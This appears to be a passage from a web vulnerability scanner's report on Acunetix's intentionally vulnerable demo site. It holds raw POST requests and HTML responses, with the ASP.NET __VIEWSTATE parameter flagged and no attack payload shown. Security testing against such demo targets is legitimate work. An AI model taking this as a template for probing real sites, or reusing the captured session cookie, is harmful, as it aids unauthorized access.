Request Body - size: 1,067 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8371&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAIDVJ%2FjT2ghkZGQKZvm%2BHAg1iXmykDnvv0L%2FmbwQJg%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKYkb7GAQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJGa8nCz%2FyGg31MzNr0O4EcjpZQ2
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:53:59 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAIDVJ/jT2ghkZGQKZvm+HAg1iXmykDnvv0L/mbwQJg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKYkb7GAQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJGa8nCz/yGg31MzNr0O4EcjpZQ2" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:White" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1061 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,061 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8386&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAMAHpMHf2ghkZGRqcXbaBojxK1fiDSNMozj46HOLzw%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK%2F35LoCAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJnyLA7byFn5hdnjzIZQKwBxUC6P
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:36:23 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAMAHpMHf2ghkZGRqcXbaBojxK1fiDSNMozj46HOLzw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK/35LoCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJnyLA7byFn5hdnjzIZQKwBxUC6P" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:White" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1063 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
